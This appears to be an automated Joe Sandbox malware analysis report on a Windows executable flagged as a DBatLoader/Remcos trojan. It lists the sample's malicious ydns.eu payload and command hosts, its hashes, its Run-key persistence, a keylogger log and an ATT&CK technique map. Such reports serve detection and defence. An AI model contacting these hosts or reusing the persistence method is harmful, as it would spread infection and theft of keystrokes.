                    Source: Yara matchFile source: 00000008.00000003.253092372.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253076423.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Valid Accounts
                    1
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium12
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default Accounts2
                    Service Execution
                    1
                    Valid Accounts
                    1
                    Bypass User Access Control
                    2
                    Obfuscated Files or Information
                    21
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol21
                    Input Capture
                    Exfiltration Over Bluetooth2
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                    Defacement
                    Domain AccountsAt (Linux)1
                    Windows Service
                    1
                    Valid Accounts
                    1
                    DLL Side-Loading
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares12
                    Clipboard Data
                    Automated Exfiltration1
                    Non-Standard Port
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)1
                    Registry Run Keys / Startup Folder
                    11
                    Access Token Manipulation
                    1
                    Bypass User Access Control
                    NTDS2
                    File and Directory Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon Script1
                    Windows Service
                    11
                    Masquerading
                    LSA Secrets24
                    System Information Discovery
                    SSHKeyloggingData Transfer Size Limits112
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.common312
                    Process Injection
                    1
                    Valid Accounts
                    Cached Domain Credentials121
                    Security Software Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup Items1
                    Registry Run Keys / Startup Folder
                    1
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                    Access Token Manipulation
                    Proc Filesystem3
                    Process Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                    Remote System Discovery
                    Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Fnvtdhenapsfwu.exe62%ReversingLabsWin32.Trojan.Remcos
                    SourceDetectionScannerLabelLink
                    C:\Users\Public\Libraries\Fnvtdhen.PIF62%ReversingLabsWin32.Trojan.Remcos
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    http://://t.exet.exen0%Avira URL Cloudsafe
                    http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapsll&=100%Avira URL Cloudphishing
                    http://://t.exet.exe0%Avira URL Cloudsafe
                    http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapsf100%Avira URL Cloudphishing
                    http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLLq/100%Avira URL Cloudphishing
                    http://wsvdyhrgebwhevawe.ydns.eu/100%Avira URL Cloudphishing
                    tornado.ydns.eu100%Avira URL Cloudphishing
                    http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenaps100%Avira URL Cloudphishing
                    http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLL100%Avira URL Cloudphishing
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    orifak.ydns.eu
                    193.42.32.61
                    truetrue
                      unknown
                      wsvdyhrgebwhevawe.ydns.eu
                      81.161.229.9
                      truetrue
                        unknown
                        tornado.ydns.eu
                        193.42.32.61
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapstrue
                          • Avira URL Cloud: phishing
                          unknown
                          tornado.ydns.eutrue
                          • Avira URL Cloud: phishing
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://geoplugin.net/json.gpSndVol.exefalse
                          • URL Reputation: safe
                          unknown
                          http://://t.exet.exenFnvtdhenapsfwu.exe, 00000000.00000002.216838629.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLLFnvtdhen.PIF, 00000002.00000002.253289545.00000000005C5000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://://t.exet.exeFnvtdhen.PIF, 00000002.00000002.253230097.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://wsvdyhrgebwhevawe.ydns.eu/Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005D6000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://geoplugin.net/json.gp/CSndVol.exe, 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapsll&=Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.0000000000591000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://www.pmail.comFnvtdhenapsfwu.exe, Fnvtdhenapsfwu.exe, 00000000.00000002.217337311.0000000002CD9000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000002.221331055.000000007FD20000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsfFnvtdhen.PIF, 00000002.00000002.253289545.00000000005A1000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            unknown
                            http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLLq/Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005C5000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            81.161.229.9
                            wsvdyhrgebwhevawe.ydns.euGermany
                            33657CMCSUStrue
                            193.42.32.61
                            orifak.ydns.euGermany
                            3221EENET-ASEEtrue
                            IP
                            192.168.2.1
                            Joe Sandbox Version:38.0.0 Beryl
                            Analysis ID:1303888
                            Start date and time:2023-09-05 22:19:48 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 10m 21s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:Fnvtdhenapsfwu.exe
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@6/3@4/3
                            EGA Information:
                            • Successful, ratio: 50%
                            HDC Information:
                            • Successful, ratio: 21.3% (good quality ratio 20.2%)
                            • Quality average: 81.6%
                            • Quality standard deviation: 26%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, kv501.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: Fnvtdhenapsfwu.exe
                            TimeTypeDescription
                            22:20:39API Interceptor1x Sleep call for process: Fnvtdhenapsfwu.exe modified
                            22:20:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fnvtdhen C:\Users\Public\Fnvtdhen.url
                            22:20:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fnvtdhen C:\Users\Public\Fnvtdhen.url
                            22:20:54API Interceptor1x Sleep call for process: Fnvtdhen.PIF modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\SndVol.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):3.369167134696068
                            Encrypted:false
                            SSDEEP:3:rmlql7lQNd/lnq5JWRal2Jl+7R0DAlBG4moojklovDl6v:KlRNi5YcIeeDAlS1gWAv
                            MD5:0E6C4C6494E8D563882175A365488D13
                            SHA1:45B37A739A9868BECEC3DE9C5ADC0B654AE8959A
                            SHA-256:7EBF554F6B4C8ED72A2144EA1395BAFC4FB99AE4A56DEA9BF2A368D80E32E5A1
                            SHA-512:2311DD2FBE44074C33169F91EF8148FB776AEDE01944EF3B54A890599A4E9C0F3BAD20D7C2061340AE2E433A8BCAE55D8AFC7FD7B9D65F18A0BAC9C5D7C21351
                            Malicious:true
                            Reputation:low
                            Preview:....[.2.0.2.3./.0.9./.0.5. .2.2.:.2.0.:.4.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                            Process:C:\Users\user\Desktop\Fnvtdhenapsfwu.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Fnvtdhen.PIF">), ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):99
                            Entropy (8bit):4.9763390393549205
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMTRuL1EysbxovtKRPK:HRYFVmTWDyz08BZExytK9K
                            MD5:928836AD0DD52122BB9A9A40825BC079
                            SHA1:C26578D2CA5F86A0B4C86270FF63F581344EB445
                            SHA-256:AAC3F8C4BC51B6B1BC4572E288916BC5D7E8B643935F022D1B4FC44246F35338
                            SHA-512:F7832BDB19624D5502DB5A245E7175967096AB7F12E70112699AAC18DDF369B618FA62F61AFD5B59632F089EA074B65DE957B30D44F136B0171FB83F6BF8AE9D
                            Malicious:false
                            Reputation:low
                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Fnvtdhen.PIF"..IconIndex=9..HotKey=37..
                            Process:C:\Users\user\Desktop\Fnvtdhenapsfwu.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1243648
                            Entropy (8bit):6.2960091515949825
                            Encrypted:false
                            SSDEEP:24576:ORTaL+A2f8Zhp8bYm1EnyWjkf0eFuPD+4m:gTaKsh
                            MD5:CFFE529403460C6AFFE0F52C1E7DE602
                            SHA1:3E03898F87C2CC47D57893C3DD55302281E9F2B5
                            SHA-256:56A3DC5C90ADE897E349BA0FD0433770DCDDA32B5BD2A1C6608B2AF2F9B34C05
                            SHA-512:C94045AE5B144141A33C2EE980F1B276C7DED8B1F574C91B6F6E57F4B410CE93440255FCF64DF493526959155C67280159829D10360CE595EBE42E7732269AC1
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Fnvtdhen.PIF, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 62%
                            Reputation:low
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................t....................@..............................................@...........................0..r.... ...^......................@............................p...................... 9..,............................text... v.......x.................. ..`.itext..8............|.............. ..`.data....O.......P..................@....bss.....8...............................idata..r....0...0..................@....tls....@....`...........................rdata.......p......................@..@.reloc..@...........................@..B.rsrc....^... ...^..................@..@....................................@..@................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.2960091515949825
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.38%
                            • InstallShield setup (43055/19) 0.43%
                            • Windows Screen Saver (13104/52) 0.13%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            File name:Fnvtdhenapsfwu.exe
                            File size:1'243'648 bytes
                            MD5:cffe529403460c6affe0f52c1e7de602
                            SHA1:3e03898f87c2cc47d57893c3dd55302281e9f2b5
                            SHA256:56a3dc5c90ade897e349ba0fd0433770dcdda32b5bd2a1c6608b2af2f9b34c05
                            SHA512:c94045ae5b144141a33c2ee980f1b276c7ded8b1f574c91b6f6e57f4b410ce93440255fcf64df493526959155c67280159829d10360ce595ebe42e7732269ac1
                            SSDEEP:24576:ORTaL+A2f8Zhp8bYm1EnyWjkf0eFuPD+4m:gTaKsh
                            TLSH:E5457DE2A354CC72F06A3578C849B6C0382A7DED693A5CCD666C794A1A73761793C03F
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:71e191928686b3a5
                            Entrypoint:0x489900
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                            DLL Characteristics:
                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:beefa6546dd4570bf21020f1082d8b97
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFF0h
                            mov eax, 00488360h
                            call 00007FC438DF3901h
                            mov eax, dword ptr [0050EDBCh]
                            mov eax, dword ptr [eax]
                            push eax
                            mov eax, dword ptr [0050EDD0h]
                            mov eax, dword ptr [eax]
                            push eax
                            mov eax, dword ptr [0050ECBCh]
                            mov eax, dword ptr [eax]
                            push eax
                            mov eax, dword ptr [005117FCh]
                            push eax
                            call 00007FC438E74F72h
                            call 00007FC438DF147Dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1130000x2e72.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1220000x15e00.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000x9340.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x1170000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x1139200x72c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x876200x87800False0.5196807973939115data6.548203907656841IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0x890000x9380xa00False0.58359375data6.10757289766183IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x8a0000x84fd40x85000False0.344478750587406data4.487974311252079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0x10f0000x38840x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0x1130000x2e720x3000False0.3133951822916667data4.995784798933046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .tls0x1160000x400x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0x1170000x180x200False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x1180000x93400x9400False0.6007970861486487data6.675728362695167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0x1220000x15e000x15e00False0.14052455357142857data3.8426006120251004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_CURSOR0x12333c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                            RT_CURSOR0x1234700x134dataEnglishUnited States0.4642857142857143
                            RT_CURSOR0x1235a40x134dataEnglishUnited States0.4805194805194805
                            RT_CURSOR0x1236d80x134dataEnglishUnited States0.38311688311688313
                            RT_CURSOR0x12380c0x134dataEnglishUnited States0.36038961038961037
                            RT_CURSOR0x1239400x134dataEnglishUnited States0.4090909090909091
                            RT_CURSOR0x123a740x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                            RT_BITMAP0x123ba80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                            RT_BITMAP0x123d780x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                            RT_BITMAP0x123f5c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                            RT_BITMAP0x12412c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                            RT_BITMAP0x1242fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                            RT_BITMAP0x1244cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                            RT_BITMAP0x12469c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                            RT_BITMAP0x12486c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                            RT_BITMAP0x124a3c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                            RT_BITMAP0x124c0c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                            RT_BITMAP0x124ddc0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                            RT_BITMAP0x124f040x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                            RT_BITMAP0x12502c0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                            RT_BITMAP0x1251540xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                            RT_BITMAP0x12523c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                            RT_BITMAP0x1253640x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                            RT_BITMAP0x12548c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                            RT_BITMAP0x12555c0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                            RT_BITMAP0x1256840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                            RT_BITMAP0x1257ac0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                            RT_BITMAP0x1258d40x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                            RT_BITMAP0x1259fc0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                            RT_BITMAP0x125b240xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                            RT_BITMAP0x125c0c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                            RT_BITMAP0x125d340x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                            RT_BITMAP0x125e5c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                            RT_BITMAP0x125f2c0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                            RT_BITMAP0x1260540x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                            RT_BITMAP0x12617c0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                            RT_BITMAP0x1262a40x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                            RT_BITMAP0x1263cc0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                            RT_BITMAP0x1264f40xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                            RT_BITMAP0x1265dc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                            RT_BITMAP0x1267040x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                            RT_BITMAP0x12682c0xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                            RT_BITMAP0x1268fc0x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                            RT_BITMAP0x126a240x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                            RT_BITMAP0x126b4c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                            RT_ICON0x126c340x1bc8Device independent bitmap graphic, 72 x 144 x 8, image size 5184, 256 important colors0.12570303712035996
                            RT_ICON0x1287fc0x608Device independent bitmap graphic, 20 x 40 x 8, image size 400, 256 important colors0.23056994818652848
                            RT_ICON0x128e040x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.04953789279112754
                            RT_ICON0x12e28c0x3a48Device independent bitmap graphic, 60 x 120 x 32, image size 148800.05630026809651475
                            RT_ICON0x131cd40x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 67200.08994082840236686
                            RT_ICON0x13373c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.16639344262295083
                            RT_ICON0x1340c40x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 16800.19883720930232557
                            RT_ICON0x13477c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.18882978723404256
                            RT_DIALOG0x134be40x52data0.7682926829268293
                            RT_DIALOG0x134c380x52data0.7560975609756098
                            RT_STRING0x134c8c0x27cdata0.4748427672955975
                            RT_STRING0x134f080x3ecdata0.4213147410358566
                            RT_STRING0x1352f40x4c8data0.38480392156862747
                            RT_STRING0x1357bc0x9cdata0.717948717948718
                            RT_STRING0x1358580xecdata0.6271186440677966
                            RT_STRING0x1359440x1a4data0.5357142857142857
                            RT_STRING0x135ae80x43cdata0.38468634686346864
                            RT_STRING0x135f240x348data0.4119047619047619
                            RT_STRING0x13626c0x370data0.34545454545454546
                            RT_STRING0x1365dc0x390data0.40789473684210525
                            RT_STRING0x13696c0xd0data0.5721153846153846
